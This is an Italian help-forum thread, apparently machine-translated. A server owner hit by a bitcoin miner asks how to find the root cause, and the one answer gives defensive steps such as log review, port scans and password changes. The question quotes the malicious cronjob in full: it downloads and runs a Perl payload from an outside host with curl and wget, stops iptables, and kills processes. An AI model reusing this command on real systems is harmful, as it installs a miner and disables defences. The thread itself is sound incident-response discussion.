il mio server è stato violato e ho solo potuto trovare il comando cronjob [duplicato]

Question

il mio server è stato violato e ho solo potuto trovare il comando cronjob [duplicato]

#1 da (2 voti)

1

Ho installato i rilevatori di Clamav e rootkit e non hanno trovato nulla.

Il virus esegue alcuni processi denominati moduli che mangiano cpu, il mio server venditore mi ha detto che è un virus bitcoin miner ma non mi hanno dato altre informazioni. L'unica cosa che ho scoperto è questo cronjob:

*      *       *       *       *       curl -o /tmp/.selfish http://royaltyhomeins.com/.god;/sbin/service iptables stop;wget -O /tmp/.selfish http://royaltyhomeins.com/.god;killall -9 perl;killall -9 packet;perl /tmp/.selfish;rm -rf /tmp/.selfish

Ho ucciso tutto il processo e rimosso il cronjob. La cartella / tmp è vuota. Il problema è che non ho trovato il "problema" di base. Cos'altro posso fare?

linux virus virus-removal

posta Amir Bar 09.01.2017 - 12:17

fonte

1 risposta

Leggi altre domande sui tag linux virus virus-removal

In che modo Secure to inoltra lo streaming CCTV al cloud del dispositivo Chiave esadecimale privata esadecimale nella libreria di file PEM [chiusa]

score 2 · Answer 1

Da quello che hai detto, è difficile dire se il server è stato violato tramite la tua app / sito web, o tramite qualche software obsoleto, o in qualche altro modo, ma alcune cose che potresti provare:

Controlla i tuoi log di apache / nginx e prova a trovare le richieste sospette.
Verifica le versioni del software server (server web, perl, php ...) e cerca versioni obsolete.
Fai un portscan con nmap e cerca le porte che sono aperte ma non dovrebbe essere.
Fai una scansione veloce con nikto o qualche altro scanner di sicurezza webapp. Prova wpscan se stai usando wordpress.
Continua a monitorare le connessioni in uscita e cerca attività sospette.
Modifica le tue password.
Chiedi / paga qualcuno per valutare la sicurezza della tua app Web.

Ma fondamentalmente solo i file di log potevano individuare la causa principale. Gli altri metodi possono identificare le vulnerabilità, ma in questo caso non è possibile stabilire se siano state utilizzate dall'hacker.